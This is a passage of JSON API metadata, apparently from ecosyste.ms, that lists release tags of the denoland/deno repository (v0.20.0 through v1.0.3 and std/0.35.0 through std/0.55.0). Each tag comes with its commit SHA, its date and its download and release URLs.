@std%2F0.55.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.55.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.55.0/manifests"},{"name":"v1.0.3","sha":"106b00173806e088472e123d04fdc8d260c3820d","kind":"commit","published_at":"2020-05-29T16:48:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.3/manifests"},{"name":"std/0.54.0","sha":"106b00173806e088472e123d04fdc8d260c3820d","kind":"commit","published_at":"2020-05-29T16:48:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.54.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.54.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.54.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.54.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.54.0/manifests"},{"name":"std/0.53.0","sha":"526c9196e23af34d1ecd424d09c99c7003c33844","kind":"commit","published_at":"2020-05-22T18:00:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.53.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.53.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.53.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.53.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.53.0/manifests"},{"name":"v1.0.2","sha":"526c9196e23af34d1ecd424d09c99c7003c33844","kind":"commit","published_at":"2020-05-22T18:00:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.2/manifests"},{"name":"v1.0.1","sha":"49dda23f6b936f21de2a3de4be39771f30ddd6e9","kind":"commit","published_at":"2020-05-20T16:40:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.1/manifests"},{"name":"std/0.52.0","sha":"49dda23f6b936f21de2a3de4be39771f30ddd6e9","kind":"commit","published_at":"2020-05-20T16:40:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.52.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.52.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.52.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.52.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.52.0/manifests"},{"name":"std/0.51.0","sha":"c474d383543708fc636c06dd2e4a9100495f45c5","kind":"commit","published_at":"2020-05-14T11:45:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.51.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.51.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.51.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.51.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.51.0/manifests"},{"name":"v1.0.0","sha":"55d2c6bd103879263c115fa5697f3cf3101158f4","kind":"commit","published_at":"2020-05-13T22:07:15.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0/manifests"},{"name":"v1.0.0-rc3","sha":"35e8bc8de65b523e082d446dc25f114ed81264a8","kind":"commit","published_at":"2020-05-12T12:33:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.0-rc3","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.0-rc3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.0-rc3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0-rc3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0-rc3/manifests"},{"name":"v1.0.0-rc2","sha":"d8f5b37218715bbc624eb53dd4b7409867b2c803","kind":"commit","published_at":"2020-05-09T19:37:22.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.0-rc2","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.0-rc2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.0-rc2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0-rc2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0-rc2/manifests"},{"name":"std/0.50.0","sha":"d5dd5ae87d7598643a46f27fa4a11b2a85d42be8","kind":"commit","published_at":"2020-05-09T13:15:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.50.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.50.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.50.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.50.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.50.0/manifests"},{"name":"v1.0.0-rc1","sha":"5f67a202ff59f25ea183c261f664a6db06407e17","kind":"commit","published_at":"2020-05-04T19:46:39.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.0-rc1","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.0-rc1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.0-rc1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0-rc1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0-rc1/manifests"},{"name":"v0.42.0","sha":"f92bb9cf4de6ed4b6a84a14775e0dbe4ed45291a","kind":"commit","published_at":"2020-04-29T21:04:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.42.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.42.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.42.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.42.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.42.0/manifests"},{"name":"std/0.42.0","sha":"f92bb9cf4de6ed4b6a84a14775e0dbe4ed45291a","kind":"commit","published_at":"2020-04-29T21:04:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.42.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.42.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.42.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.42.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.42.0/manifests"},{"name":"v0.41.0","sha":"00fa4858b071739c76965e3c9ae096f2084d701b","kind":"commit","published_at":"2020-04-16T14:47:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.41.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.41.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.41.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.41.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.41.0/manifests"},{"name":"std/0.41.0","sha":"00fa4858b071739c76965e3c9ae096f2084d701b","kind":"commit","published_at":"2020-04-16T14:47:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.41.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.41.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.41.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.41.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.41.0/manifests"},{"name":"v0.40.0","sha":"0cf4ac91e6917b76c00d3d4b790e9fefc4dc5323","kind":"commit","published_at":"2020-04-08T18:59:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.40.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.40.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.40.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.40.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.40.0/manifests"},{"name":"std/0.40.0","sha":"0cf4ac91e6917b76c00d3d4b790e9fefc4dc5323","kind":"commit","published_at":"2020-04-08T18:59:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.40.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.40.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.40.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.40.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.40.0/manifests"},{"name":"v0.39.0","sha":"cb0acfe305a0f2f13773f41a038d8a919c3730ae","kind":"commit","published_at":"2020-04-03T18:38:56.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.39.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.39.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.39.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.39.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.39.0/manifests"},{"name":"std/0.39.0","sha":"cb0acfe305a0f2f13773f41a038d8a919c3730ae","kind":"commit","published_at":"2020-04-03T18:38:56.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.39.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.39.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.39.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.39.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.39.0/manifests"},{"name":"v0.38.0","sha":"d6cb3892d48209fdb9c5196bb444e33a82bd3724","kind":"commit","published_at":"2020-03-28T19:26:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.38.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.38.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.38.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.38.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.38.0/manifests"},{"name":"std/0.38.0","sha":"d6cb3892d48209fdb9c5196bb444e33a82bd3724","kind":"commit","published_at":"2020-03-28T19:26:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.38.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.38.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.38.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.38.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.38.0/manifests"},{"name":"v0.37.1","sha":"b924e5ab7e69eab4d3b6d9a863a8fc2974f33b5d","kind":"commit","published_at":"2020-03-23T21:14:34.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.37.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.37.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.37.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.37.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.37.1/manifests"},{"name":"v0.37.0","sha":"d143fe61bc61030c0874c091aa0dd8bf5141b5fa","kind":"commit","published_at":"2020-03-23T16:28:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.37.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.37.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.37.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.37.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.37.0/manifests"},{"name":"std/0.37.0","sha":"d143fe61bc61030c0874c091aa0dd8bf5141b5fa","kind":"commit","published_at":"2020-03-23T16:28:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.37.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.37.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.37.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.37.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.37.0/manifests"},{"name":"v0.36.0","sha":"3ed6ccc905394ed9c5d9cbcb8fa2426151780788","kind":"commit","published_at":"2020-03-11T23:13:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.36.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.36.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.36.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.36.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.36.0/manifests"},{"name":"std/0.36.0","sha":"3ed6ccc905394ed9c5d9cbcb8fa2426151780788","kind":"commit","published_at":"2020-03-11T23:13:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.36.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.36.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.36.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.36.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.36.0/manifests"},{"name":"v0.35.0","sha":"a29343c7d6b5dad26c5d501eb6d21e9caf382a58","kind":"commit","published_at":"2020-02-29T04:49:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.35.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.35.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.35.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.35.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.35.0/manifests"},{"name":"std/0.35.0","sha":"a29343c7d6b5dad26c5d501eb6d21e9caf382a58","kind":"commit","published_at":"2020-02-29T04:49:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.35.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.35.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.35.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.35.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.35.0/manifests"},{"name":"v0.34.0","sha":"a0d3b4ebc509d9e5dfca555084fd1100e114664a","kind":"commit","published_at":"2020-02-20T15:57:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.34.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.34.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.34.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.34.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.34.0/manifests"},{"name":"std/0.34.0","sha":"a0d3b4ebc509d9e5dfca555084fd1100e114664a","kind":"commit","published_at":"2020-02-20T15:57:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.34.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.34.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.34.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.34.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.34.0/manifests"},{"name":"v0.33.0","sha":"87c329c45ac0e3382c115793094317df15cbe5bf","kind":"commit","published_at":"2020-02-13T22:45:22.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.33.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.33.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.33.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.33.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.33.0/manifests"},{"name":"v0.32.0","sha":"f4cc08c4fc97f86d82b860ac11a134dad75dfdca","kind":"commit","published_at":"2020-02-03T15:36:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.32.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.32.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.32.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.32.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.32.0/manifests"},{"name":"v0.31.0","sha":"8bc639a23e141d350e35ea112a4a9be2ea536fe6","kind":"commit","published_at":"2020-01-24T16:07:53.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.31.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.31.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.31.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.31.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.31.0/manifests"},{"name":"v0.30.1","sha":"7fd50065a7d8a4c6ed1b1090703a7baaabdbd6aa","kind":"commit","published_at":"2020-01-21T17:44:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.30.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.30.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.30.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.30.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.30.1/manifests"},{"name":"v0.30.0","sha":"b2f01dcb50c68da2cab28b6bd64f4033e4ccf10e","kind":"commit","published_at":"2020-01-18T12:58:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.30.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.30.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.30.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.30.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.30.0/manifests"},{"name":"v0.29.0","sha":"525784e5642cbd869c682a0fda595f55c785d607","kind":"commit","published_at":"2020-01-09T18:42:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.29.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.29.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.29.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.29.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.29.0/manifests"},{"name":"v0.28.1","sha":"a61966a243cd5d09031fabd9a572a75aab8d2da8","kind":"commit","published_at":"2020-01-03T14:04:04.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.28.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.28.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.28.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.28.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.28.1/manifests"},{"name":"v0.28.0","sha":"328fef9cd6aa0ab3033380cabdf91b9779db5054","kind":"commit","published_at":"2020-01-02T13:41:25.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.28.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.28.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.28.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.28.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.28.0/manifests"},{"name":"v0.27.0","sha":"fcae4a7c0dc74701f3b1919bfd76cfdc1a0321ed","kind":"commit","published_at":"2019-12-18T23:48:41.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.27.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.27.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.27.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.27.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.27.0/manifests"},{"name":"v0.26.0","sha":"0ce9011edc8ec53df47e3103ecca3069d385ce37","kind":"commit","published_at":"2019-12-06T02:41:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.26.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.26.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.26.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.26.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.26.0/manifests"},{"name":"v0.25.0","sha":"2cd22b5437a375f0e33f26327101afb818a03802","kind":"commit","published_at":"2019-11-26T18:01:59.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.25.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.25.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.25.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.25.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.25.0/manifests"},{"name":"v0.24.0","sha":"0fffef8e5afed754358efc5b41d93549592cd941","kind":"commit","published_at":"2019-11-15T03:52:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.24.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.24.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.24.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.24.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.24.0/manifests"},{"name":"v0.23.0","sha":"a611788834e40153ef27c8f1d6b7fd52c8a016b1","kind":"tag","published_at":"2019-11-05T02:50:15.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.23.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.23.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.23.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.23.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.23.0/manifests"},{"name":"v0.22.0","sha":"71efe6f2c530d1cb9e8a2679f5778e2c034a9d0d","kind":"commit","published_at":"2019-10-28T18:12:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.22.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.22.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.22.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.22.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.22.0/manifests"},{"name":"v0.21.0","sha":"4e88ba9a114279b3969d5ccca1cca0f74c8fc1fd","kind":"commit","published_at":"2019-10-19T22:46:02.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.21.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.21.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.21.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.21.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.21.0/manifests"},{"name":"v0.20.0","sha":"a4b27db21a10f9913460c054c98fce59f3dd157d","kind":"commit","published_at":"2019-10-07T16:57:29.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.20.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.20.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.20.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.20.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/